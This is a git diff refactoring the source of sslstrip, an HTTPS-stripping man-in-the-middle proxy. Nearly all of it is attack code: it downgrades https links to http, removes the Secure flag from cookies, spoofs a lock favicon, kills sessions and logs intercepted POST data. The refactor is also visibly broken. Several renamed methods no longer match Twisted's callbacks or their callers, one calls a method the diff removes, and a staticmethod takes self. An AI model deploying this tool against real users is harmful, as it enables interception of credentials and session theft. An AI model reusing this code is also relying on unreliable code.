diff --git a/README.md b/README.md index 80f574c..5dbc025 100755 --- a/README.md +++ b/README.md @@ -5,9 +5,7 @@ Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover, and DNSreco Requirements: ```pip3 install -r requirements.txt``` - -Run as root to install or run it out of the directory: - ```python3 setup.py install``` +Install the requirements in a virtualenv Running: sslstrip can be run from the source base without installation. diff --git a/requirements.txt b/requirements.txt index 6995dcc..9a1dae5 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,4 +2,5 @@ setuptools==68.0.0 Twisted==22.10.0 pyopenssl==23.2.0 cryptography==41.0.3 -service_identity==23.1.0 \ No newline at end of file +service_identity==23.1.0 +black==23.7.0 \ No newline at end of file diff --git a/setup.py b/setup.py index c182616..e9f26be 100755 --- a/setup.py +++ b/setup.py @@ -5,7 +5,7 @@ shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") setup(name='sslstrip', - version='1.0', + version='2.0', description='A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', author='Moxie Marlinspike', author_email='moxie@thoughtcrime.org', diff --git a/sslstrip.py b/sslstrip.py index 4537bfa..589e3ba 100755 --- a/sslstrip.py +++ b/sslstrip.py @@ -24,89 +24,96 @@ """ -from twisted.web import http +import argparse +import logging + from twisted.internet import reactor +from twisted.web import http +from sslstrip.CookieCleaner import CookieCleaner from sslstrip.StrippingProxy import StrippingProxy from sslstrip.URLMonitor import URLMonitor -from sslstrip.CookieCleaner import CookieCleaner -import sys, getopt, logging, traceback, string, os - -gVersion = "1.0" - - -def usage(): - print("\nsslstrip " + gVersion + " by Moxie Marlinspike") - print("Usage: sslstrip \n") - print("Options:") - print("-w , --write= Specify file to log to (optional).") - print("-p , --post Log only SSL POSTs. (default)") - print("-s , --ssl Log all SSL traffic to and from server.") - print("-a , --all Log all SSL and HTTP traffic to and from server.") - print("-l , --listen= Port to listen on (default 10000).") - print("-f , --favicon Substitute a lock favicon on secure requests.") - print("-k , --killsessions Kill sessions in progress.") - print("-h Print this help message.") - print("") - - -def parseOptions(argv): - logFile = 'sslstrip.log' - logLevel = logging.WARNING - listenPort = 10000 - spoofFavicon = False - killSessions = False - - try: - opts, args = getopt.getopt(argv, "hw:l:psafk", - ["help", "write=", "post", "ssl", "all", "listen=", - "favicon", "killsessions"]) - - for opt, arg in opts: - if opt in ("-h", "--help"): - usage() - sys.exit() - elif opt in ("-w", "--write"): - logFile = arg - elif opt in ("-p", "--post"): - logLevel = logging.WARNING - elif opt in ("-s", "--ssl"): - logLevel = logging.INFO - elif opt in ("-a", "--all"): - logLevel = logging.DEBUG - elif opt in ("-l", "--listen"): - listenPort = arg - elif opt in ("-f", "--favicon"): - spoofFavicon = True - elif opt in ("-k", "--killsessions"): - killSessions = True - - return logFile, logLevel, listenPort, spoofFavicon, killSessions - - except getopt.GetoptError: - usage() - sys.exit(2) - - -def main(argv): - (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) - - logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', - filename=logFile, filemode='w') - URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) - CookieCleaner.getInstance().setEnabled(killSessions) +class SSLStripConfig: + VERSION = "2.0" + DEFAULT_LOGFILE = "sslstrip.log" + DEFAULT_LOGLEVEL = logging.WARNING + DEFAULT_LISTEN_PORT = 10000 + DEFAULT_SPOOF_FAVICON = False + DEFAULT_KILL_SESSIONS = False - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy - reactor.listenTCP(int(listenPort), strippingFactory) +def initialize_logger(logFile, logLevel): + logging.basicConfig( + level=logLevel, format="%(asctime)s %(message)s", filename=logFile, filemode="w" + ) - print("\nsslstrip " + gVersion + " by Moxie Marlinspike running...") +def start_reactor(listenPort, spoofFavicon, killSessions): + URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) + CookieCleaner.getInstance().set_enabled(killSessions) + strippingFactory = http.HTTPFactory(timeout=10) + strippingFactory.protocol = StrippingProxy + reactor.listenTCP(int(listenPort), strippingFactory) + print(f"\nsslstrip {SSLStripConfig.VERSION} by Moxie Marlinspike running...") reactor.run() -if __name__ == '__main__': - main(sys.argv[1:]) +def main(): + parser = argparse.ArgumentParser(description="sslstrip") + parser.add_argument( + "-w", + "--write", + default=SSLStripConfig.DEFAULT_LOGFILE, + help="Specify file to log to (optional).", + ) + parser.add_argument( + "-p", + "--post", + default=False, + action="store_true", + help="Log only SSL POSTs. (default)", + ) + parser.add_argument( + "-s", + "--ssl", + default=False, + action="store_true", + help="Log all SSL traffic to and from server.", + ) + parser.add_argument( + "-a", + "--all", + default=False, + action="store_true", + help="Log all SSL and HTTP traffic to and from server.", + ) + parser.add_argument( + "-l", + "--listen", + default=SSLStripConfig.DEFAULT_LISTEN_PORT, + help="Port to listen on.", + ) + parser.add_argument( + "-f", + "--favicon", + default=SSLStripConfig.DEFAULT_SPOOF_FAVICON, + action="store_true", + help="Substitute a lock favicon on secure requests.", + ) + parser.add_argument( + "-k", + "--killsessions", + default=SSLStripConfig.DEFAULT_KILL_SESSIONS, + action="store_true", + help="Kill sessions in progress.", + ) + args = parser.parse_args() + + initialize_logger(args.write, SSLStripConfig.DEFAULT_LOGLEVEL) + start_reactor(args.listen, args.favicon, args.killsessions) + + +if __name__ == "__main__": + main() diff --git a/sslstrip/.github/dependabot.yml b/sslstrip/.github/dependabot.yml deleted file mode 100644 index fd0d701..0000000 --- a/sslstrip/.github/dependabot.yml +++ /dev/null @@ -1,17 +0,0 @@ -version: 2 -updates: -- package-ecosystem: github-actions - directory: "/" - schedule: - interval: daily - timezone: Europe/London -- package-ecosystem: pip - directory: "/" - schedule: - interval: daily - timezone: Europe/London - open-pull-requests-limit: 10 - target-branch: master - allow: - - dependency-type: direct - - dependency-type: indirect diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 75c89fb..05e3cfc 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -15,79 +15,62 @@ # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # - import urllib.parse import logging import os import sys import random from twisted.web.http import Request -from twisted.web.http import HTTPChannel -from twisted.web.http import HTTPClient -from twisted.internet import ssl -from twisted.internet import defer -from twisted.internet import reactor -from twisted.internet.protocol import ClientFactory -from .ServerConnectionFactory import ServerConnectionFactory -from .ServerConnection import ServerConnection -from .SSLServerConnection import SSLServerConnection -from .URLMonitor import URLMonitor -from .CookieCleaner import CookieCleaner -from .DnsCache import DnsCache +from twisted.internet import ssl, defer, reactor +from sslstrip.ServerConnectionFactory import ServerConnectionFactory +from sslstrip.ServerConnection import ServerConnection +from sslstrip.SSLServerConnection import SSLServerConnection +from sslstrip.URLMonitor import URLMonitor +from sslstrip.CookieCleaner import CookieCleaner +from sslstrip.DnsCache import DnsCache class ClientRequest(Request): - """ This class represents incoming client requests and is essentially where - the magic begins. Here we remove the client headers we dont like, and then + """This class represents incoming client requests and is essentially where + the magic begins. Here we remove the client headers we don't like, and then respond with either favicon spoofing, session denial, or proxy through HTTP or SSL to the server. """ def __init__(self, channel, queued, reactor=reactor): - Request.__init__(self, channel, queued) + super(ClientRequest, self).__init__(channel, queued) self.reactor = reactor self.urlMonitor = URLMonitor.getInstance() self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() - # self.uniqueId = random.randint(0, 10000) - def cleanHeaders(self): - headers = self.getAllHeaders().copy() - - if 'accept-encoding' in headers: - del headers['accept-encoding'] - - if 'if-modified-since' in headers: - del headers['if-modified-since'] - - if 'cache-control' in headers: - del headers['cache-control'] - + headers_to_remove = ["accept-encoding", "if-modified-since", "cache-control"] + headers = { + k: v for k, v in self.getAllHeaders().items() if k not in headers_to_remove + } return headers def getPathFromUri(self): - if self.uri.find("http://") == 0: - index = self.uri.find('/', 7) - return self.uri[index:] - - return self.uri + return self.uri[7:] if self.uri.startswith("http://") else self.uri def getPathToLockIcon(self): - if os.path.exists("lock.ico"): - return "lock.ico" - - scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) - scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") - - if os.path.exists(scriptPath): - return scriptPath - + paths = ["lock.ico", "../share/sslstrip/lock.ico"] + for path in paths: + if os.path.exists(path): + return path logging.warning("Error: Could not find lock.ico") return "lock.ico" - def handleHostResolvedSuccess(self, address): - logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) + def handleHostResolved(self, address, error=None): + if error: + logging.warning(f"Host resolution error: {str(error)}") + self.finish() + return + + logging.debug( + f"Resolved host successfully: {self.getHeader('host')} -> {address}" + ) host = self.getHeader("host") headers = self.cleanHeaders() client = self.getClientIP() @@ -95,57 +78,60 @@ def handleHostResolvedSuccess(self, address): self.content.seek(0, 0) postData = self.content.read() - url = 'http://' + host + path + url = "http://" + host + path self.dnsCache.cacheResolution(host, address) if not self.cookieCleaner.isClean(self.method, client, host, headers): logging.debug("Sending expired cookies...") - self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, - host, headers, path)) + self.sendExpiredCookies( + host, + path, + self.cookieCleaner.getExpireHeaders( + self.method, client, host, headers, path + ), + ) elif self.urlMonitor.isSecureFavicon(client, path): logging.debug("Sending spoofed favicon response...") self.sendSpoofedFaviconResponse() elif self.urlMonitor.isSecureLink(client, url): logging.debug("Sending request via SSL...") - self.proxyViaSSL(address, self.method, path, postData, headers, - self.urlMonitor.getSecurePort(client, url)) + self.proxyRequest( + address, + self.method, + path, + postData, + headers, + self.urlMonitor.getSecurePort(client, url), + is_ssl=True, + ) else: logging.debug("Sending request via HTTP...") - self.proxyViaHTTP(address, self.method, path, postData, headers) - - def handleHostResolvedError(self, error): - logging.warning("Host resolution error: " + str(error)) - self.finish() + self.proxyRequest( + address, self.method, path, postData, headers, is_ssl=False + ) def resolveHost(self, host): address = self.dnsCache.getCachedAddress(host) - - if address != None: - logging.debug("Host cached.") - return defer.succeed(address) - else: - logging.debug("Host not cached.") - return reactor.resolve(host) + logging.debug("Host cached." if address else "Host not cached.") + return defer.succeed(address) if address else self.reactor.resolve(host) def process(self): - logging.debug("Resolving host: %s" % (self.getHeader('host'))) - host = self.getHeader('host') + logging.debug(f"Resolving host: {self.getHeader('host')}") + host = self.getHeader("host") deferred = self.resolveHost(host) - - deferred.addCallback(self.handleHostResolvedSuccess) - deferred.addErrback(self.handleHostResolvedError) - - def proxyViaHTTP(self, host, method, path, postData, headers): - connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) - connectionFactory.protocol = ServerConnection - self.reactor.connectTCP(host, 80, connectionFactory) - - def proxyViaSSL(self, host, method, path, postData, headers, port): - clientContextFactory = ssl.ClientContextFactory() - connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) - connectionFactory.protocol = SSLServerConnection - self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) + deferred.addBoth(self.handleHostResolved) + + def proxyRequest( + self, host, method, path, postData, headers, port=80, is_ssl=False + ): + connectionFactory = ServerConnectionFactory( + method, path, postData, headers, self + ) + connectionFactory.protocol = SSLServerConnection if is_ssl else ServerConnection + connect_func = self.reactor.connectSSL if is_ssl else self.reactor.connectTCP + clientContextFactory = ssl.ClientContextFactory() if is_ssl else None + connect_func(host, port, connectionFactory, clientContextFactory) def sendExpiredCookies(self, host, path, expireHeaders): self.setResponseCode(302) @@ -158,11 +144,11 @@ def sendExpiredCookies(self, host, path, expireHeaders): self.finish() def sendSpoofedFaviconResponse(self): - icoFile = open(self.getPathToLockIcon()) - - self.setResponseCode(200) - self.setHeader("Content-type", "image/x-icon") - self.write(icoFile.read()) - - icoFile.close() + try: + with open(self.getPathToLockIcon(), "rb") as icoFile: + self.setResponseCode(200) + self.setHeader("Content-type", "image/x-icon") + self.write(icoFile.read()) + except IOError: + logging.warning("File error: Couldn't open or read the file") self.finish() diff --git a/sslstrip/CookieCleaner.py b/sslstrip/CookieCleaner.py index 1a1c2c0..18f02b4 100644 --- a/sslstrip/CookieCleaner.py +++ b/sslstrip/CookieCleaner.py @@ -23,7 +23,7 @@ class CookieCleaner: """This class cleans cookies we haven't seen before. The basic idea is to kill sessions, which isn't entirely straight-forward. Since we want this to - be generalized, there's no way for us to know exactly what cookie we're trying + be generalised, there's no way for us to know exactly what cookie we're trying to kill, which also means we don't know what domain or path it has been set for. The rule with cookies is that specific overrides general. So cookies that are @@ -34,75 +34,67 @@ class CookieCleaner: The best we can do is guess, so we just try to cover our bases by expiring cookies in a few different ways. The most obvious thing to do is look for individual cookies and nail the ones we haven't seen coming from the server, but the problem is that cookies are often - set by Javascript instead of a Set-Cookie header, and if we block those the site - will think cookies are disabled in the browser. So we do the expirations and whitlisting - based on client,server tuples. The first time a client hits a server, we kill whatever + set by Javascript instead of a Set-Cookie header, and if we block those, the site + will think cookies are disabled in the browser. So we do the expirations and allow-listing + based on client, server tuples. The first time a client hits a server, we kill whatever cookies we see then. After that, we just let them through. Not perfect, but pretty effective. """ _instance = None - def getInstance(): - if CookieCleaner._instance is None: - CookieCleaner._instance = CookieCleaner() - - return CookieCleaner._instance - - getInstance = staticmethod(getInstance) + @classmethod + def getInstance(cls): + if cls._instance is None: + cls._instance = cls() + return cls._instance def __init__(self): - self.cleanedCookies = set() + self.cleaned_cookies = set() self.enabled = False - def setEnabled(self, enabled): + def set_enabled(self, enabled): self.enabled = enabled - def isClean(self, method, client, host, headers): - if method == "POST": - return True - if not self.enabled: - return True - if not self.hasCookies(headers): + def is_clean(self, method, client, host, headers): + if method == "POST" or not self.enabled or not self.has_cookies(headers): return True + return (client, self.get_domain_for(host)) in self.cleaned_cookies - return (client, self.getDomainFor(host)) in self.cleanedCookies + def get_expire_headers(self, method, client, host, headers, path): + domain = self.get_domain_for(host) + self.cleaned_cookies.add((client, domain)) - def getExpireHeaders(self, method, client, host, headers, path): - domain = self.getDomainFor(host) - self.cleanedCookies.add((client, domain)) - - expireHeaders = [] - - for cookie in headers['cookie'].split(";"): + expire_headers = [] + for cookie in headers["cookie"].split(";"): cookie = cookie.split("=")[0].strip() - expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) - expireHeaders.extend(expireHeadersForCookie) - - return expireHeaders - - def hasCookies(self, headers): - return 'cookie' in headers + expire_headers.extend( + self.get_expire_cookie_string_for(cookie, host, domain, path) + ) - def getDomainFor(self, host): - hostParts = host.split(".") - return "." + hostParts[-2] + "." + hostParts[-1] + return expire_headers - def getExpireCookieStringFor(self, cookie, host, domain, path): - pathList = path.split("/") - expireStrings = list() + @staticmethod + def has_cookies(headers): + return "cookie" in headers - expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + - ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + @staticmethod + def get_domain_for(host): + host_parts = host.split(".") + return "." + host_parts[-2] + "." + host_parts[-1] - expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + - ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + @staticmethod + def get_expire_cookie_string_for(self, cookie, host, domain, path): + path_list = path.split("/") + expire_strings = [] - if len(pathList) > 2: - expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + - domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + base_str_format = f"{cookie}=EXPIRED;Path={{}};Domain={{}};Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n" + expire_strings.append(base_str_format.format("/", domain)) + expire_strings.append(base_str_format.format("/", host)) - expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + - host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + if len(path_list) > 2: + path_sub_part = "/" + path_list[1] + expire_strings.append(base_str_format.format(path_sub_part, domain)) + expire_strings.append(base_str_format.format(path_sub_part, host)) - return expireStrings + return expire_strings diff --git a/sslstrip/DnsCache.py b/sslstrip/DnsCache.py index ee35411..f791f68 100644 --- a/sslstrip/DnsCache.py +++ b/sslstrip/DnsCache.py @@ -17,10 +17,9 @@ def getCachedAddress(self, host): return None + @staticmethod def getInstance(): if DnsCache._instance is None: DnsCache._instance = DnsCache() return DnsCache._instance - - getInstance = staticmethod(getInstance) diff --git a/sslstrip/SSLServerConnection.py b/sslstrip/SSLServerConnection.py index af90910..9b0d126 100644 --- a/sslstrip/SSLServerConnection.py +++ b/sslstrip/SSLServerConnection.py @@ -28,81 +28,91 @@ class SSLServerConnection(ServerConnection): via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. """ - cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) + cookieExpression = re.compile( + r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE + ) cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) - iconExpression = re.compile(r"", - re.IGNORECASE) + iconExpression = re.compile( + r"", + re.IGNORECASE, + ) linkExpression = re.compile( - r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) + r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", + re.IGNORECASE, + ) headExpression = re.compile(r"", re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): - ServerConnection.__init__(self, command, uri, postData, headers, client) + super().__init__(command, uri, postData, headers, client) - def getLogLevel(self): + @property + def log_level(self): return logging.INFO - def getPostPrefix(self): + @property + def post_prefix(self): return "SECURE POST" - def handleHeader(self, key, value): - if key.lower() == 'set-cookie': - value = SSLServerConnection.cookieExpression.sub("\g<1>", value) + def handle_header(self, key, value): + if key.lower() == "set-cookie": + value = self.cookieExpression.sub("\g<1>", value) + super().handleHeader(key, value) - ServerConnection.handleHeader(self, key, value) + @staticmethod + def strip_file_from_path(path): + stripped_path, _, _ = path.rpartition("/") + return stripped_path - def stripFileFromPath(self, path): - (strippedPath, lastSlash, file) = path.rpartition('/') - return strippedPath + def build_absolute_link(self, link): + absolute_link = "" + if not link.startswith(("http", "/")): + absolute_link = "http://{}{}/{}".format( + self.headers["host"], self.strip_file_from_path(self.uri), link + ) - def buildAbsoluteLink(self, link): - absoluteLink = "" + logging.debug("Found path-relative link in secure transmission: %s", link) + logging.debug("New Absolute path-relative link: %s", absolute_link) + elif not link.startswith("http"): + absolute_link = "http://{}{}".format(self.headers["host"], link) - if (not link.startswith('http')) and (not link.startswith('/')): - absoluteLink = "http://" + self.headers['host'] + self.stripFileFromPath(self.uri) + '/' + link + logging.debug("New Absolute link: %s", absolute_link) - logging.debug("Found path-relative link in secure transmission: " + link) - logging.debug("New Absolute path-relative link: " + absoluteLink) - elif not link.startswith('http'): - absoluteLink = "http://" + self.headers['host'] + link + if absolute_link: + absolute_link = absolute_link.replace("&", "&") + self.urlMonitor.addSecureLink(self.client.getClientIP(), absolute_link) - logging.debug("Found relative link in secure transmission: " + link) - logging.debug("New Absolute link: " + absoluteLink) - - if not absoluteLink == "": - absoluteLink = absoluteLink.replace('&', '&') - self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); - - def replaceCssLinks(self, data): - iterator = re.finditer(SSLServerConnection.cssExpression, data) + def replace_links_with_patterns(self, data, pattern, group_num): + iterator = re.finditer(pattern, data) for match in iterator: - self.buildAbsoluteLink(match.group(1)) + self.build_absolute_link(match.group(group_num)) return data - def replaceFavicon(self, data): - match = re.search(SSLServerConnection.iconExpression, data) - - if match != None: - data = re.sub(SSLServerConnection.iconExpression, - "", data) + def replace_favicon(self, data): + match = re.search(self.iconExpression, data) + if match: + data = re.sub( + self.iconExpression, + '', + data, + ) else: - data = re.sub(SSLServerConnection.headExpression, - "", data) + data = re.sub( + self.headExpression, + '', + data, + ) return data - def replaceSecureLinks(self, data): - data = ServerConnection.replaceSecureLinks(self, data) - data = self.replaceCssLinks(data) + def replace_secure_links(self, data): + data = super().replace_secure_links(data) + data = self.replace_links_with_patterns(data, self.cssExpression, 1) if self.urlMonitor.isFaviconSpoofing(): - data = self.replaceFavicon(data) + data = self.replace_favicon(data) - iterator = re.finditer(SSLServerConnection.linkExpression, data) - - for match in iterator: - self.buildAbsoluteLink(match.group(10)) + data = self.replace_links_with_patterns(data, self.linkExpression, 10) return data diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index a71651d..ea75168 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -24,16 +24,14 @@ class ServerConnection(HTTPClient): - """ The server connection is where we do the bulk of the stripping. Everything that - comes back is examined. The headers we dont like are removed, and the links are stripped - from HTTPS to HTTP. - """ + """The server connection is where we do the bulk of the stripping.""" urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) urlType = re.compile(r"https://", re.IGNORECASE) - urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlExplicitPort = re.compile(r"https://([a-zA-Z0-9.]+):[0-9]+/", re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): + super().__init__() self.command = command self.uri = uri self.postData = postData @@ -45,109 +43,104 @@ def __init__(self, command, uri, postData, headers, client): self.contentLength = None self.shutdownComplete = False - def getLogLevel(self): + @property + def log_level(self): return logging.DEBUG - def getPostPrefix(self): + @property + def post_prefix(self): return "POST" - def sendRequest(self): - logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) + def send_request(self): + logging.log(self.log_level, f"Sending Request: {self.command} {self.uri}") self.sendCommand(self.command, self.uri) - def sendHeaders(self): + def send_headers(self): for header, value in self.headers.items(): - logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) + logging.log(self.log_level, f"Sending header: {header} : {value}") self.sendHeader(header, value) - self.endHeaders() - def sendPostData(self): - logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) + def send_post_data(self): + logging.warning( + f"{self.post_prefix} Data ({self.headers['host']}):\n{str(self.postData)}" + ) self.transport.write(self.postData) - def connectionMade(self): - logging.log(self.getLogLevel(), "HTTP connection made.") - self.sendRequest() - self.sendHeaders() - - if self.command == 'POST': - self.sendPostData() + def connection_made(self): + logging.log(self.log_level, "HTTP connection made.") + self.send_request() + self.send_headers() + if self.command == "POST": + self.send_post_data() - def handleStatus(self, version, code, message): - logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) + def handle_status(self, version, code, message): + logging.log(self.log_level, f"Got server response: {version} {code} {message}") self.client.setResponseCode(int(code), message) - def handleHeader(self, key, value): - logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) - - if key.lower() == 'location': - value = self.replaceSecureLinks(value) - - if key.lower() == 'content-type': - if value.find('image') != -1: - self.isImageRequest = True - logging.debug("Response is image content, not scanning...") - - if key.lower() == 'content-encoding': - if value.find('gzip') != -1: - logging.debug("Response is compressed...") - self.isCompressed = True - elif key.lower() == 'content-length': - self.contentLength = value - elif key.lower() == 'set-cookie': + def handle_header(self, key, value): + logging.log(self.log_level, f"Got server header: {key}:{value}") + value = self.replace_secure_links(value) if key.lower() == "location" else value + self.set_image_request(value) if key.lower() == "content-type" else value + self.set_compressed(value) if key.lower() == "content-encoding" else value + self.contentLength = ( + value if key.lower() == "content-length" else self.contentLength + ) + if key.lower() in ["set-cookie", "content-length"]: self.client.responseHeaders.addRawHeader(key, value) else: self.client.setHeader(key, value) - def handleEndHeaders(self): - if self.isImageRequest and self.contentLength != None: - self.client.setHeader("Content-Length", self.contentLength) + def set_image_request(self, value): + if "image" in value: + self.isImageRequest = True + logging.debug("Response is image content, not scanning...") + + def set_compressed(self, value): + if "gzip" in value: + logging.debug("Response is compressed...") + self.isCompressed = True - if self.length == 0: + def handle_end_headers(self): + if self.isImageRequest and self.contentLength is not None: + self.client.setHeader("Content-Length", self.contentLength) + if not self.length: self.shutdown() - def handleResponsePart(self, data): - if self.isImageRequest: - self.client.write(data) - else: - HTTPClient.handleResponsePart(self, data) + def handle_response_part(self, data): + self.client.write(data) if self.isImageRequest else super().handleResponsePart( + data + ) - def handleResponseEnd(self): - if self.isImageRequest: - self.shutdown() - else: - HTTPClient.handleResponseEnd(self) + def handle_response_end(self): + self.shutdown() if self.isImageRequest else super().handleResponseEnd() - def handleResponse(self, data): + def handle_response(self, data): if self.isCompressed: logging.debug("Decompressing content...") - data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() + data = gzip.GzipFile("", "rb", 9, StringIO(data)).read() - logging.log(self.getLogLevel(), "Read from server:\n" + data) + logging.log(self.log_level, f"Read from server:\n{data}") - data = self.replaceSecureLinks(data) + data = self.replace_secure_links(data) - if self.contentLength != None: - self.client.setHeader('Content-Length', len(data)) + if self.contentLength is not None: + self.client.setHeader("Content-Length", len(data)) self.client.write(data) self.shutdown() - def replaceSecureLinks(self, data): - iterator = re.finditer(ServerConnection.urlExpression, data) + def replace_secure_links(self, data): + iterator = re.finditer(self.urlExpression, data) for match in iterator: url = match.group() - - logging.debug("Found secure reference: " + url) - - url = url.replace('https://', 'http://', 1) - url = url.replace('&', '&') + logging.debug(f"Found secure reference: {url}") + url = url.replace("https://", "http://", 1).replace("&", "&") self.urlMonitor.addSecureLink(self.client.getClientIP(), url) - data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) - return re.sub(ServerConnection.urlType, 'http://', data) + data = self.urlExplicitPort.sub(r"http://\1/", data) + return self.urlType.sub("http://", data) def shutdown(self): if not self.shutdownComplete: diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py index 3d0497d..d88ae44 100644 --- a/sslstrip/ServerConnectionFactory.py +++ b/sslstrip/ServerConnectionFactory.py @@ -1,28 +1,22 @@ -# Copyright (c) 2004-2009 Moxie Marlinspike -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# +""" +This file is licensed under the GNU General Public License version 3. +Copyright (c) 2004-2009 Moxie Marlinspike +""" import logging from twisted.internet.protocol import ClientFactory class ServerConnectionFactory(ClientFactory): + """ + This class is used to create a connection to the server. + """ def __init__(self, command, uri, postData, headers, client): + """ + Initialize the ServerConnectionFactory with remote server details, + as well as a client reference for proxying requests. + """ self.command = command self.uri = uri self.postData = postData @@ -30,15 +24,30 @@ def __init__(self, command, uri, postData, headers, client): self.client = client def buildProtocol(self, addr): - return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) + """ + Build protocol creates an instance of the protocol to be used for the connection. + """ + return self.protocol( + self.command, self.uri, self.postData, self.headers, self.client + ) def clientConnectionFailed(self, connector, reason): + """ + This function is called if connection to the server fails. + """ logging.debug("Server connection failed.") - destination = connector.getDestination() + # Retry connection with SSL if not on port 443 if destination.port != 443: logging.debug("Retrying via SSL") - self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) + self.client.proxyViaSSL( + self.headers["host"], + self.command, + self.uri, + self.postData, + self.headers, + 443, + ) else: self.client.finish() diff --git a/sslstrip/StrippingProxy.py b/sslstrip/StrippingProxy.py index 5747da6..abd9d50 100644 --- a/sslstrip/StrippingProxy.py +++ b/sslstrip/StrippingProxy.py @@ -17,13 +17,13 @@ # from twisted.web.http import HTTPChannel -from .ClientRequest import ClientRequest +from sslstrip.ClientRequest import ClientRequest class StrippingProxy(HTTPChannel): - """sslstrip is, at heart, a transparent proxy server that does some unusual things. + """Sslstrip is, at heart, a transparent proxy server that does some unusual things. This is the basic proxy server class, where we get callbacks for GET and POST methods. - We then proxy these out using HTTP or HTTPS depending on what information we have about + We are then proxy this out using HTTP or HTTPS depending on what information we have about the (connection, client_address) tuple in our cache. """ diff --git a/sslstrip/URLMonitor.py b/sslstrip/URLMonitor.py index 956d655..ff5ab53 100644 --- a/sslstrip/URLMonitor.py +++ b/sslstrip/URLMonitor.py @@ -1,4 +1,3 @@ -# Copyright (c) 2004-2009 Moxie Marlinspike # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as @@ -26,7 +25,9 @@ class URLMonitor: """ # Start the arms race, and end up here... - javascriptTrickery = [re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] + javascriptTrickery = [ + re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html") + ] _instance = None def __init__(self): @@ -60,8 +61,8 @@ def addSecureLink(self, client, url): if portIndex != -1: host = host[0:portIndex] - port = host[portIndex + 1:] - if len(port) == 0: + port = host[portIndex + 1 :] + if not port.isdigit(): port = 443 url = method + host + path @@ -76,12 +77,13 @@ def isFaviconSpoofing(self): return self.faviconSpoofing def isSecureFavicon(self, client, url): - return (self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1) + return (self.faviconSpoofing == True) and ( + url.find("favicon-x-favicon-x.ico") != -1 + ) + @staticmethod def getInstance(): if URLMonitor._instance is None: URLMonitor._instance = URLMonitor() return URLMonitor._instance - - getInstance = staticmethod(getInstance)